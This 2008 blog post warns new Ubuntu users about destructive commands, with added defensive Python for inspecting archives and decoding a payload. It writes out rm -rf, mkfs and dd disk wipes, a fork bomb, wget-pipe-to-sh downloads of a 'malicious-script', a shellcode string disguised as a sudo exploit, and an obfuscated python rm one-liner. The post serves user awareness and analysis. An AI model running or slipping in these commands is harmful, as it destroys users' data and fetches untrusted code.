Sunday, November 2, 2008

Dangerous Commands You Should Not Run in Ubuntu Linux!!

A collection of dangerous commands that will damage your Ubuntu operating system! Please DO NOT execute any of them without proper knowledge; just read and learn!

sudo rm -rf / (will delete all the files on your system) - requires administrator rights!
sudo rm -rf . (will delete the current directory you are in) - requires administrator rights!
sudo rm -rf * (will delete all the files in the current folder) - requires administrator rights!
rm -rf * or rm -rf *.* (will delete all the files in the current folder) - no administrator rights needed!
rm -rf ~/ & (will destroy your home directory) - no administrator rights needed!


Commands which will erase your hard disk!

sudo mkfs (will format your hard drive) - requires administrator rights!
sudo mkfs.ext3 (will format your hard drive) - requires administrator rights!
sudo mkfs.bfs (will format your hard drive) - requires administrator rights!
sudo mkfs.cramfs (will format your hard drive) - No administrator rights needed!
sudo mkfs.ext2 (will format your hard drive) - requires administrator rights!
sudo mkfs.minix (will format your hard drive) - requires administrator rights!
sudo mkfs.msdos (will format your hard drive) - requires administrator rights!
sudo mkfs.reiserfs (will format your hard drive) - requires administrator rights!
sudo mkfs.vfat (will format your hard drive) - requires administrator rights!

The dd command can be very dangerous, especially when you have no idea what it does! Below are some examples, but remember that the exact form varies a lot!
sudo dd if=/dev/zero of=/dev/hda (MOST DANGEROUS COMMAND! It will zero out the whole primary IDE hard drive) (requires administrator rights)
sudo dd if=/dev/hda of=/dev/hdb (needs administrator rights)
sudo dd if=something of=/dev/hda (needs administrator rights)

WARNING: /dev/hda and /dev/hdb from the above example can be replaced with /dev/sda or /dev/sdb in the case of SATA and SCSI.

Block device manipulation: causes raw data to be written to a block device. Often this will wreck the filesystem and cause total loss of data!
any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb: a malicious script that keeps spawning processes until your system freezes. This forces you to do a hard reboot, which may cause damage to your system.

The commands below look really intriguing, and curiosity may lead new and inexperienced users to execute them! DON'T EXECUTE THEM!

CODE :
:(){:|:&};:
CODE :
fork while fork

Tarbomb: let's say that somebody who wants to help you offers a tar.gz or tar.bz2 archive and asks you to extract it into an existing directory. This archive can be crafted to explode into billions of files, or to overwrite existing files on the system by guessing their filenames. Make it a habit to decompress tar.gz or tar.bz2 archives inside a newly created empty directory!

Decompression bomb: here's another example. Let's say somebody asks you to extract an archive which appears to be a small download. In reality it is highly compressed data that will inflate to hundreds of gigabytes, filling your hard drive until the system freezes! Do not touch data from an untrusted source!
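As an added example (not code from the original post), here is a small Python inspector that reads a tar.gz's headers before anything is extracted, flagging paths that escape the target directory, link entries, and a suspicious member count, total size or compression ratio. The limits and the constructed sample archives are assumptions:

```python
import io
import tarfile
from pathlib import PurePosixPath

# Assumed limits for this example; tune them to your own environment.
MAX_MEMBERS = 10_000
MAX_TOTAL_BYTES = 1 << 30          # 1 GiB of extracted data
MAX_RATIO = 100.0                  # uncompressed bytes per compressed byte


def escapes_target(name: str) -> bool:
    """True if a member path would land outside the extraction directory."""
    p = PurePosixPath(name)
    return p.is_absolute() or ".." in p.parts


def inspect_archive(data: bytes) -> dict:
    """Read the tar headers only; nothing is written to disk. The sizes in
    the headers are exactly what an extraction would produce, so a
    decompression bomb shows up as a huge total and ratio before any file
    is created, and a tarbomb as an absurd member count or escaping paths."""
    found = {"members": 0, "total_bytes": 0, "bad_paths": [], "links": []}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for m in tar:
            found["members"] += 1
            found["total_bytes"] += m.size
            if escapes_target(m.name):
                found["bad_paths"].append(m.name)
            if m.issym() or m.islnk():     # link targets can also point outside
                found["links"].append(m.name)
    found["ratio"] = found["total_bytes"] / max(len(data), 1)
    found["safe"] = (not found["bad_paths"] and not found["links"]
                     and found["members"] <= MAX_MEMBERS
                     and found["total_bytes"] <= MAX_TOTAL_BYTES
                     and found["ratio"] <= MAX_RATIO)
    return found


def build_sample(members: dict) -> bytes:
    """Constructed test input: a tar.gz of zero-filled files, name -> size."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, size in members.items():
            info = tarfile.TarInfo(name)
            info.size = size
            tar.addfile(info, io.BytesIO(bytes(size)))
    return buf.getvalue()


if __name__ == "__main__":
    print(inspect_archive(build_sample({"docs/readme": 10, "../outside": 5})))
    print(inspect_archive(build_sample({"big.bin": 20_000_000}))["ratio"])
```

Only archives reported as safe should then be extracted, and still into a fresh empty directory as the post advises.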

Shellscript: this one is very dangerous! Somebody gives you a link to download a shell script and then asks you to execute it. The script can contain any dangerous command the author chooses, and it will damage your system. Do not execute code from people you don't trust! Here are some examples:
CODE :
wget http://my_site/my_file
sh ./some_file

Example :
wget http://ceattingal.ac.in/malicious-script
sh ./malicious-script

or
wget http://my_site/my_file -O- | sh
Example :
wget http://ihrd.org/malicious-script -O- | sh

Compiling code: some person gives you the source code of an application and tells you to compile it. It is easy to hide dangerous code inside a large wad of source, and the attacker can easily damage your system this way. So do not compile or execute the compiled code unless the source is that of a well-known application, obtained from a reputable site.

A famous example I have seen on a mailing list was disguised as a proof-of-concept sudo exploit, claiming that if you run it, sudo grants you root without a shell. There was this payload:

CODE :
char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

To the new and inexperienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, it actually runs rm -rf ~ / &, which will destroy your home directory as a regular user, or all files as root.
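As an added example (not from the original post or the mailing list), the following Python reads the payload above purely as data: it lists the plain-text strings a casual reader sees, then reconstructs the command the shellcode really builds on the stack with push immediates and bitwise NOT, showing why the visible cp/chmod string is a decoy. The jmp/call/pop layout and the byte-scan heuristic are assumptions tied to this specific payload:

```python
import re
import struct

# Copy of the byte string from the post (backslash escapes restored), embedded
# here as data so the analysis runs offline and nothing is ever executed.
PAYLOAD = (
    b"\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    b"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
    b"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    b"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    b"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
    b"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    b"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
    b"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;"
)


def visible_strings(blob: bytes, min_len: int = 5) -> list[str]:
    """What the `strings` tool would show: runs of printable ASCII.
    Here that is "/bin/sh" plus the decoy command, which the code never uses."""
    return [m.decode() for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def code_region(blob: bytes) -> bytes:
    """The payload opens with a short jmp (EB rel8) over its code to the call
    that fetches the data address, so the code is the first 2 + rel8 bytes."""
    if blob[0] != 0xEB:
        raise ValueError("expected the jmp / call / pop pattern of this payload")
    return blob[: 2 + blob[1]]


def pushed_immediates(code: bytes) -> list[int]:
    """Immediates of each 'push imm32' (68 xx xx xx xx), in execution order.
    A byte scan, not a disassembler; adequate for this small code region."""
    return [struct.unpack_from("<I", code, i + 1)[0]
            for i in range(len(code) - 4) if code[i] == 0x68]


def recover_stack_string(blob: bytes) -> str:
    """Rebuild the string the shellcode assembles on the stack and hands to
    /bin/sh -c. The last push lands at the lowest address (hence reversed) and
    the four 'not dword [esi+n]' instructions undo the obfuscation (hence ~v)."""
    imms = pushed_immediates(code_region(blob))
    raw = b"".join(struct.pack("<I", ~v & 0xFFFFFFFF) for v in reversed(imms))
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")


if __name__ == "__main__":
    print("strings shows:", visible_strings(PAYLOAD))
    print("really executed:", repr(recover_stack_string(PAYLOAD)))
```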

Here's another example of code that should definitely NOT be executed by anyone!

CODE : python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

Where "sn!.sg!+" is simply rm -rf * shifted a character up.

This is just for the awareness of new and inexperienced users. You must know the above commands, but don't try them without proper knowledge. Good luck!
